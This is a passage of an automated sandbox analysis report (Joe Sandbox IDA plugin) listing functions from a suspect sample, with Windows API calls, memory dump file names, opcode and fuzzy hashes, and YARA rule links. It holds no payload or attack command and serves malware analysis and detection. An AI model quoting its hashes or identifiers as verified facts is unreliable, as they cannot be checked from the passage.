                                                                                  • Opcode Fuzzy Hash: 8f385544bad1f22c242810019e6a2bb94703e8f8522350f15491bc20473a14ec
                                                                                  • Instruction Fuzzy Hash: 71F05EB1C0511CEACF1ADFA8C842AEDB7B8AF89314F1446CEA115AB291CB785F44CB51
                                                                                  Function 0040BC01 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0040BC18
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 501242067-0
                                                                                  • Opcode ID: 89f787f418b28ca22ed136954b72ca9b6b16358106742e5ea65c87c3e26667ec
                                                                                  • Instruction ID: fb13b940fff762313b909319a9df45b7b6b25380c2a7943f57b7f1fbf1f360ec
                                                                                  • Opcode Fuzzy Hash: 89f787f418b28ca22ed136954b72ca9b6b16358106742e5ea65c87c3e26667ec
                                                                                  • Instruction Fuzzy Hash: 93F0F8F4A001059BDB00DF94D882E5AB7A5EF9D304F1001A8F808D7341E635E8618BA6
                                                                                  Function 0BE9B9FC Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: c0ae6ffc98b35ec06533d1097e51c2f42ef2c94053b7616d61686651cbc72185
                                                                                  • Instruction ID: ce52457c2ae1272404f2a1333cdf52adf358f598e8fe6d2d9cfb11dbb62cbad3
                                                                                  • Opcode Fuzzy Hash: c0ae6ffc98b35ec06533d1097e51c2f42ef2c94053b7616d61686651cbc72185
                                                                                  • Instruction Fuzzy Hash: 22E0757691521CBF9B40DE9CD881DDEB7FCEB49220F204156E958E3341E631AF449754
                                                                                  Function 6A6F1244 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: 3bd37185224070c0a61539273fb12927da37de63e12af93e3756d96671efd6ee
                                                                                  • Instruction ID: 50872d62b6857fc56e477281a54de4d190155a07deca4b8f2b9f0abd5902d540
                                                                                  • Opcode Fuzzy Hash: 3bd37185224070c0a61539273fb12927da37de63e12af93e3756d96671efd6ee
                                                                                  • Instruction Fuzzy Hash: 6BE06DB2500615ABD7008F8EC448A86F7EDDFA13B4B168827DA08CB162CBB1E445CBA4
                                                                                  Function 00449E1F Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1579825452-0
                                                                                  • Opcode ID: dbaf331f59ea131676a917ef7a8060d25baa83fd91427be639776e23a8254f4d
                                                                                  • Instruction ID: 7041beece4675cdc5c33c85ad889d1c1d18ee0184848fd224e8303d462654197
                                                                                  • Opcode Fuzzy Hash: dbaf331f59ea131676a917ef7a8060d25baa83fd91427be639776e23a8254f4d
                                                                                  • Instruction Fuzzy Hash: C3E06D335006155BD7008B5AC404B97F7ECEFA1375F26882BE408CB292CAB5E8058BA4
                                                                                  Function 0BE96170 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(0BE90000,?,00000105), ref: 0BE9618E
                                                                                    • Part of subcall function 0BE96404: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0BEF80AC), ref: 0BE9641F
                                                                                    • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9643D
                                                                                    • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9645B
                                                                                    • Part of subcall function 0BE96404: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0BE96479
                                                                                    • Part of subcall function 0BE96404: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0BE964C2
                                                                                    • Part of subcall function 0BE96404: RegQueryValueExA.ADVAPI32(?,0BE96684,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001), ref: 0BE964E0
                                                                                    • Part of subcall function 0BE96404: RegCloseKey.ADVAPI32(?,0BE9650F,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0BE96502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                  • String ID:
                                                                                  • API String ID: 2796650324-0
                                                                                  • Opcode ID: 625707c7a7bcf0b33a4968531f11949b8533d4f282da037fcc6bb0f6f5a33390
                                                                                  • Instruction ID: 050e1f5cc23d727e6692746a4625dbcfd3882170046ab968909ccdb382bf673b
                                                                                  • Opcode Fuzzy Hash: 625707c7a7bcf0b33a4968531f11949b8533d4f282da037fcc6bb0f6f5a33390
                                                                                  • Instruction Fuzzy Hash: 32E0EDB1A002149FDF10DE98D8C1A5637D8AF08754F045952ED58DF246D371D96487D5
                                                                                  Function 6A6EEEAD Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 074d63ba527334af15d46b63d9e15d79b1e7f1b687124120124fde1b1d0d35bf
                                                                                  • Instruction ID: ec75aed6f9a275a19f285525e4af3adb1b91d2b60e0dc8bb7ca4e5d9d0970fad
                                                                                  • Opcode Fuzzy Hash: 074d63ba527334af15d46b63d9e15d79b1e7f1b687124120124fde1b1d0d35bf
                                                                                  • Instruction Fuzzy Hash: 95E0DF3220E606BBCB208EA888005C63BE8AB57334B24432AE070C72D0DB3098819B90
                                                                                  Function 0044CAB5 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ed118fff639f0311c9157af4dbabd80574dffefffcd18bf4f3873c9098bc68f
                                                                                  • Instruction ID: 72a136113ef12d8f419df088b22d03553424e76b7aafd072bbb488c3aa2e27de
                                                                                  • Opcode Fuzzy Hash: 3ed118fff639f0311c9157af4dbabd80574dffefffcd18bf4f3873c9098bc68f
                                                                                  • Instruction Fuzzy Hash: 68E0923604120ADBEF60CD6898807A737D59B52330B28463BD071E3290D3748C82A799
                                                                                  Function 00424000 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000030,?,00000000), ref: 0042402F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: a7187430c4c02986b158c48688ddc6c72a72472fccc442fa29672908e4cd57cb
                                                                                  • Instruction ID: 7de73393f2d22c7f97f1ff64d3bcb864227be5c8f089a62afe50a59c36f1ff41
                                                                                  • Opcode Fuzzy Hash: a7187430c4c02986b158c48688ddc6c72a72472fccc442fa29672908e4cd57cb
                                                                                  • Instruction Fuzzy Hash: A8F0ACB4E00108AFDB04DF94D895EADF775EF48300F1082EEE91567391DA75AE01CB54
                                                                                  Function 004421E0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004421FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5e03003e743a976aca59c791bff85902756cd80c45ed87c97cfb0469da9cf4e5
                                                                                  • Instruction ID: 812773b742beabaac28696b0454d96d92f6870bf326b3091aa94c089d217b903
                                                                                  • Opcode Fuzzy Hash: 5e03003e743a976aca59c791bff85902756cd80c45ed87c97cfb0469da9cf4e5
                                                                                  • Instruction Fuzzy Hash: 59E01A729402087ADB14EAA4CD42FEF76BCAB08700F100109B701BA0C1D560AA0587A4
                                                                                  Function 0BE9B9A4 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0BE9B9B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: b074d97571478b5a7d9d58b93d66ae9cd11e265affbb6eaa2dd03f7aba6d1ea5
                                                                                  • Instruction ID: 1769a5b608c3ed0e9d9c413edcc879c895604a18fbb837d6d190acd9ebcb3f61
                                                                                  • Opcode Fuzzy Hash: b074d97571478b5a7d9d58b93d66ae9cd11e265affbb6eaa2dd03f7aba6d1ea5
                                                                                  • Instruction Fuzzy Hash: E8D05B723181107AD620955A7C84DBB6BDCCFC5775F10063DF598C3280D7208C05C371
                                                                                  Function 6A6EE09C Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6EE0BA
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 3293231637-0
                                                                                  • Opcode ID: e8e2df0220c993083616043cb2e585b31edf2660649f858009aa4c26f3aeb95c
                                                                                  • Instruction ID: dcbb2fa9f19caa5fd8e3ea64d3daddcf03869179ea85a8937b998b6064ee3ac3
                                                                                  • Opcode Fuzzy Hash: e8e2df0220c993083616043cb2e585b31edf2660649f858009aa4c26f3aeb95c
                                                                                  • Instruction Fuzzy Hash: 96D0123674A515776B315DD9EC009997689EB43BF47020035E928DB550DE21DC2182D0
                                                                                  Function 004428ED Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0044290B
                                                                                    • Part of subcall function 0046A7E7: __FF_MSGBANNER.LIBCMT ref: 0046A80A
                                                                                    • Part of subcall function 0046A7E7: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,0047603F,?,00000001,?,?,0047629C,00000018,0049EE80,0000000C,0047632D), ref: 0046A85E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 501242067-0
                                                                                  • Opcode ID: 57b08cd7df6f29454d6e4f4bd239851c47e089e7f978d8d385d9205c340d130d
                                                                                  • Instruction ID: dd1596b6df47b0a0742577a19c6570db7566c366a8a9b0f2d342d2093f4d730c
                                                                                  • Opcode Fuzzy Hash: 57b08cd7df6f29454d6e4f4bd239851c47e089e7f978d8d385d9205c340d130d
                                                                                  • Instruction Fuzzy Hash: BAD0C27230411A677B10199ADC008AB7B489B427A1B450072F804E6261DBA4CD0093C9
                                                                                  Function 0042CE00 Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000030,?,00000000), ref: 0042CE2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: a363b1066a8c1ba9216ee80c4c3bdfcc3fae504133acb0d5d20d276741aa27f9
                                                                                  • Instruction ID: 7775ece3ac55b395ce62d33e20f371e26673866e3f7728c993bfb9a6592ca9a6
                                                                                  • Opcode Fuzzy Hash: a363b1066a8c1ba9216ee80c4c3bdfcc3fae504133acb0d5d20d276741aa27f9
                                                                                  • Instruction Fuzzy Hash: DBF0C0B4E00108ABDB04DF94D855A5DB7B4EB44300F1081AAE90597341DA756E01CF98
                                                                                  Function 6A7069E4 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6A701169,?), ref: 6A7069F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
